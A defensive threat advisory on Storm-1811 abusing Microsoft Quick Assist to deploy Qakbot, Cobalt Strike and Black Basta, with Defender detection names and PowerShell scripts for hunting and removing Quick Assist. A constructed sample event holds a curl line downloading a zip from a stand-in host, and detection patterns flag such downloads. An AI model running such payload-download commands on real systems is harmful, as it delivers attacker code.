Since mid-April 2024, the financially motivated cybercriminal group Storm-1811 has been observed exploiting the Microsoft Quick Assist tool in social engineering attacks. The group, known for deploying Black Basta ransomware, begins its attack chain with voice phishing (vishing) to impersonate trusted contacts and deceive targets into granting remote access to their devices.
Misuse of Microsoft Quick Assist by Storm-1811: Technical Overview
Threat Actor: Storm-1811
Primary Tool Misused: Microsoft Quick Assist
Malware Deployed: Qakbot, Cobalt Strike, Black Basta ransomware
Attack Vectors: Vishing, Remote Monitoring and Management (RMM) tools, social engineering
Attack Chain:
- Initial Access via Vishing:
  - The threat actors initiate contact through voice phishing, pretending to be Microsoft technical support or the target's IT personnel.
  - They talk the target into launching Quick Assist, a legitimate remote support tool that ships with Windows, and into sharing the screen and granting control, which gives the actor hands-on access to the target's system.
- Remote Monitoring Tools Deployment:
  - Once control is granted, the attackers use the Quick Assist session to run scripted cURL commands that download batch files or ZIP files.
  - These files deliver additional payloads, including RMM tools such as ScreenConnect and NetSupport Manager, and Qakbot.
- Further Intrusion and Ransomware Deployment:
  - The attackers perform domain enumeration and lateral movement within the compromised environment using tools like PsExec.
  - They deploy Cobalt Strike for persistence and command and control, and eventually launch Black Basta ransomware to encrypt data and demand a ransom.
Impact:
- Organizations across various sectors, including manufacturing, construction, food and beverage, and transportation, have been targeted.
- The attacks can result in significant operational disruption, data loss, and financial loss due to ransom payments and recovery costs.
What Our Threat Intelligence Team is Seeing
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware:
- TrojanDownloader:O97M/Qakbot
- Trojan:Win32/QBot
- Trojan:Win32/Qakbot
- TrojanSpy:Win32/Qakbot
- Behavior:Win32/Qakbot
Black Basta threat components are detected as:
- Behavior:Win32/Basta
- Ransom:Win32/Basta
- Trojan:Win32/Basta
Microsoft Defender Antivirus detects Beacon running on a victim process with the following signatures:
- Behavior:Win32/CobaltStrike
- Backdoor:Win64/CobaltStrike
- HackTool:Win64/CobaltStrike
Additional Cobalt Strike components are detected with the following signatures:
- TrojanDropper:PowerShell/Cobacis
- Trojan:Win64/TurtleLoader.CS
- Exploit:Win32/ShellCode.BN
Microsoft Defender for Endpoint
Alerts with the following titles in the security center can indicate threat activity on your network:
- Suspicious activity using Quick Assist
The following alerts might also indicate activity related to this threat:
- Suspicious curl behavior
- A file or network connection related to a ransomware-linked emerging threat activity group detected — this alert captures Storm-1811 activity
- Ransomware-linked emerging threat activity group Storm-0303 detected — this alert captures some Qakbot distributor activity
- Possible Qakbot activity
- Possible NetSupport Manager activity
- Possibly malicious use of proxy or tunneling tool
- Suspicious usage of remote management software
- Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)
- Human-operated attack using Cobalt Strike
- Ransomware behavior detected in the file system
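The Defender alerts above cover environments with Defender for Endpoint. For hosts that only have Windows Security event logging, the same chain can be hunted directly: a QuickAssist.exe launch followed within a short window by curl.exe fetching a .bat or .zip file, or by a known RMM client starting. The following PowerShell is an added example, not code from the original page or from Microsoft; it assumes process-creation auditing (Event ID 4688) with command-line logging is enabled, and the QuickAssist.exe, ScreenConnect.ClientSetup.exe and client32.exe file names used in the patterns are the example author's assumptions about how those tools appear on disk. The sample events at the bottom are constructed, not real telemetry.

```powershell
# Added example (not from the original page or from Microsoft): hunt Security log
# process-creation events for the Quick Assist -> curl -> RMM chain described above.

function Find-QuickAssistAbuse {
    param(
        # Objects with Time, Image, CommandLine, ParentImage (shape assumed by this example)
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowMinutes = 60
    )
    # Quick Assist session starts (legacy in-box path or Store app path both end in QuickAssist.exe)
    $sessions = $Events | Where-Object { $_.Image -match '\\QuickAssist\.exe$' }
    # Follow-on activity: curl pulling a .bat/.zip, or an assumed RMM client name
    # (ScreenConnect.ClientSetup.exe for ScreenConnect, client32.exe for NetSupport Manager)
    $suspicious = $Events | Where-Object {
        ($_.Image -match '\\curl\.exe$' -and $_.CommandLine -match '\.(bat|zip)\b') -or
        ($_.Image -match '\\(ScreenConnect\.ClientSetup|client32)\.exe$')
    }
    foreach ($s in $sessions) {
        foreach ($p in $suspicious) {
            $delta = ($p.Time - $s.Time).TotalMinutes
            if ($delta -ge 0 -and $delta -le $WindowMinutes) {
                [pscustomobject]@{
                    SessionStart = $s.Time
                    Payload      = $p.Image
                    CommandLine  = $p.CommandLine
                    MinutesAfter = [math]::Round($delta, 1)
                }
            }
        }
    }
}

# Pull real 4688 events from the Security log into the shape Find-QuickAssistAbuse expects.
# Requires 'Audit Process Creation' plus 'Include command line in process creation events'.
function Get-ProcessCreationEvents {
    param([int] $Hours = 24)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) } |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                Image       = $d['NewProcessName']
                CommandLine = $d['CommandLine']
                ParentImage = $d['ParentProcessName']
            }
        }
}

# Constructed sample events so the logic can be exercised offline; the second event is the
# chain we want flagged, the third is an unrelated curl call outside the window.
$sample = @(
    [pscustomobject]@{ Time = Get-Date '2024-05-15 10:02:00'; Image = 'C:\Windows\System32\QuickAssist.exe'; CommandLine = 'QuickAssist.exe'; ParentImage = 'C:\Windows\explorer.exe' },
    [pscustomobject]@{ Time = Get-Date '2024-05-15 10:09:30'; Image = 'C:\Windows\System32\curl.exe'; CommandLine = 'curl -o %TEMP%\update.zip http://example.invalid/update.zip'; ParentImage = 'C:\Windows\System32\cmd.exe' },
    [pscustomobject]@{ Time = Get-Date '2024-05-15 14:00:00'; Image = 'C:\Windows\System32\curl.exe'; CommandLine = 'curl https://example.invalid/ok.txt'; ParentImage = 'C:\Windows\System32\cmd.exe' }
)

Find-QuickAssistAbuse -Events $sample | Format-Table -AutoSize

# On a live host (elevated): Find-QuickAssistAbuse -Events (Get-ProcessCreationEvents -Hours 72)
```

The window-based join is deliberately loose: the malicious curl and RMM installs are typed by the attacker during the session, so they are children of explorer.exe or cmd.exe rather than of QuickAssist.exe, and a parent-child filter would miss them. Tune `$WindowMinutes` to how long legitimate help-desk sessions run in your environment.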
What We Suggest to Stop Misuse of Microsoft Quick Assist by Storm-1811
- Block or Uninstall Quick Assist:
  - Evaluate the necessity of Quick Assist and other RMM tools in your environment. If not required, block or uninstall them to reduce the attack surface.
- Enhance Employee Awareness:
  - Conduct training sessions to educate employees on recognizing vishing and tech support scams. Emphasize the importance of verifying unsolicited support calls.
- Implement Multi-Factor Authentication (MFA):
  - Enforce MFA for accessing sensitive systems and accounts to add an additional layer of security.
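To act on the first recommendation, a host needs to be checked for Quick Assist in both of the forms Windows delivers it (the legacy in-box capability and the current Store app) and for the RMM agents named in the attack chain. The PowerShell below is an added example, not code from the original page or from Microsoft. The capability name prefix `App.Support.QuickAssist`, the Store package name `MicrosoftCorporationII.QuickAssist`, and the `ScreenConnect|NetSupport` display-name pattern are the example author's assumptions about current Windows builds; confirm them with `Get-WindowsCapability -Online` and `Get-AppxPackage -AllUsers` before relying on the script fleet-wide.

```powershell
# Added example (not from the original page or from Microsoft): inventory Quick Assist and the
# RMM tools named on this page, and optionally uninstall Quick Assist. Run in an elevated session.

function Get-RemoteSupportInventory {
    $found = @()

    # Legacy in-box Quick Assist (Windows 10 and early Windows 11) is a Windows capability.
    # Name prefix is an assumption of this example; verify with Get-WindowsCapability -Online.
    $cap = Get-WindowsCapability -Online | Where-Object { $_.Name -like 'App.Support.QuickAssist*' }
    foreach ($c in $cap) {
        if ($c.State -eq 'Installed') {
            $found += [pscustomobject]@{ Kind = 'Quick Assist (capability)'; Id = $c.Name }
        }
    }

    # Store-delivered Quick Assist (current Windows 11). Package name is an assumption of this example.
    $appx = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue
    foreach ($a in $appx) {
        $found += [pscustomobject]@{ Kind = 'Quick Assist (Store app)'; Id = $a.PackageFullName }
    }

    # RMM tools from the attack chain, located through the uninstall registry keys.
    # Extend the pattern with any other RMM product your environment does not sanction.
    $rmmPattern = 'ScreenConnect|NetSupport'
    $uninstallKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
                     'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -match $rmmPattern } |
        ForEach-Object {
            $found += [pscustomobject]@{ Kind = 'RMM: ' + $_.DisplayName; Id = $_.PSChildName }
        }

    $found
}

function Remove-QuickAssist {
    [CmdletBinding(SupportsShouldProcess)]
    param()

    # Capability form: removable with Remove-WindowsCapability.
    Get-WindowsCapability -Online |
        Where-Object { $_.Name -like 'App.Support.QuickAssist*' -and $_.State -eq 'Installed' } |
        ForEach-Object {
            if ($PSCmdlet.ShouldProcess($_.Name, 'Remove-WindowsCapability')) {
                Remove-WindowsCapability -Online -Name $_.Name | Out-Null
            }
        }

    # Store form: removable for all users with Remove-AppxPackage -AllUsers.
    Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue |
        ForEach-Object {
            if ($PSCmdlet.ShouldProcess($_.PackageFullName, 'Remove-AppxPackage')) {
                Remove-AppxPackage -Package $_.PackageFullName -AllUsers
            }
        }
}

Get-RemoteSupportInventory | Format-Table -AutoSize

# Preview the removal first, then drop -WhatIf to uninstall:
# Remove-QuickAssist -WhatIf
```

Uninstalling closes the hands-on access path this campaign depends on, but it does not stop a user from reinstalling the Store app; pair it with a Store or AppLocker policy if the help desk does not need Quick Assist at all, and keep the inventory function in a scheduled job so newly appearing RMM agents surface quickly.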